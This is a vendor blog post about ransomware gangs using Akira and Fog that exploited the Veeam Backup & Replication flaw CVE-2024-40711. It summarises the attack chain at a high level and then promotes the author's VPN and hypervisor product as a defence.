A newly disclosed vulnerability in Veeam Backup & Replication software, CVE-2024-40711, has become a focal point for cybercriminals, resulting in a string of ransomware attacks that have affected organizations globally.

This vulnerability, rated an alarming 9.8 out of 10 on the CVSS scale, allows attackers to remotely execute code without authentication. Threat actors have capitalized on this flaw, deploying notorious ransomware like Akira and Fog to cause widespread disruption and exfiltrate sensitive data.

The Attack: How it Happened

The exploitation of the Veeam vulnerability typically began with attackers gaining access to corporate networks using compromised VPN credentials. Many of these VPNs were running outdated software, without the protection of multifactor authentication, providing an open door for attackers. Once inside, they exploited the vulnerable /trigger URI on port 8000 of the Veeam Backup & Replication system.

Through this URI, attackers executed commands using Veeam’s Backup.MountService.exe process, creating local accounts with administrative privileges. These accounts were then used to install ransomware, including Akira and Fog, which targeted critical systems such as Hyper-V servers. In one instance, attackers used the Rclone tool to exfiltrate data, marking the attack as not just a disruptive force but also a major data breach risk.

The combination of unauthorized access and the ability to execute code without authentication made this vulnerability especially dangerous. Once attackers established a foothold, they could elevate privileges, bypass security measures, and lock down vital systems through ransomware—crippling operations.

The Ransomware Payloads: Akira and Fog

Both Akira and Fog ransomware are known for their devastating impact. Akira, which first emerged in early 2024, quickly gained a reputation for its speed and ability to encrypt large amounts of data. It uses a combination of AES and RSA encryption to lock files, demanding a ransom in exchange for the decryption key. Fog ransomware, on the other hand, is less well-known but no less dangerous, often targeting unprotected servers and leveraging weak backup systems.

In the most high-profile cases, attackers behind these ransomware strains targeted critical infrastructure by planting the ransomware on Hyper-V servers, which are commonly used in enterprise virtual environments. By taking down Hyper-V, attackers effectively paralyzed entire IT infrastructures, making recovery and mitigation exponentially more difficult.

The exploitation of Veeam’s vulnerability not only provided an entry point for ransomware but also exposed the broader risk of poorly secured backup systems. These systems are often neglected in cybersecurity strategies, yet they are a rich target for attackers looking to disrupt businesses and hold data hostage.

How Beam Can Help Prevent These Types of Attacks

The Veeam vulnerability and subsequent ransomware attacks underscore the importance of securing remote access and backup systems. This is where Beam comes in, offering a robust solution to help prevent similar attacks from taking root in your network.

1

Always-On VPN Protection

Beam enforces a strict always-on VPN policy, ensuring that all traffic from remote devices is securely tunneled through corporate VPNs. By maintaining secure connections at all times, Beam eliminates the risk of traffic being exposed to the public internet—one of the primary avenues exploited in the Veeam attacks. Beam’s secure tunnels also prevent users from disabling or tampering with their VPN configurations, safeguarding against misconfigurations that could be exploited.

2

Hypervisor-Level Security

Beam’s MicroV hypervisor technology operates beneath the operating system, securely managing network interfaces and forcing all data traffic through encrypted VPN tunnels. This architecture prevents attackers from gaining unauthorized access to network interfaces, even if they manage to compromise the endpoint. In the event of a breach similar to the Veeam attack, Beam’s hypervisor would block any attempts to exploit the network traffic or VPN settings.

3

Centrally Managed VPN Configurations

In the case of the Veeam vulnerability, one of the key factors that made organizations vulnerable was inconsistent or outdated VPN configurations. Beam addresses this by allowing centralized management of VPN configurations, ensuring that all endpoints are configured securely and consistently. This eliminates the risk of human error, which can leave systems exposed to vulnerabilities.

Beam offers the tools to ensure that all traffic is securely encrypted, with network interfaces managed at the hypervisor level to prevent exploitation. By deploying solutions that prioritize security at every level, organizations can protect their most valuable systems and data from the ever-growing threat of ransomware attacks.

Connect from Anywhere with Confidence

Akira Fog Ransomware Veaam VPN Vulnerabilities

Unprotected Backups, Devastating Ransomware: Lessons from the Veeam Exploitation